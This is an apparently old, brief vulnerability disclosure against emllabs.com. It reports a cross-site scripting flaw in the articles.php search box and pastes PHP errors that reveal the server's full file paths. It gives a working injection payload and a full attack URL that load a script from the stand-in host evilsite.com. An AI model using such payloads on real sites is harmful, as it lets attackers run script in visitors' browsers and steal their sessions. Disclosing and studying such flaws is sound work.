Emllabs.com Effected files: articles.php search input box. The search input box doesnt properally filter user input. for PoC try putting in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] XSS Vulnerability: http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] Full path disclosure error: http://previous.emllabs.com/article.php?articleId= Warning: main(_articles//article.php): failed to open stream: No such file or directory in /home/virtual/site479/fst/var/www/html/domain/article.php on line 53 Warning: main(_articles//article.php): failed to open stream: No such file or directory in /home/virtual/site479/fst/var/www/html/domain/article.php on line 53 Warning: main(): Failed opening '_articles//article.php' for inclusion (include_path='.:/php/includes:/usr/share/php:/usr/share/pear') in /home/virtual/site479/fst/var/www/html/domain/article.php on line 53
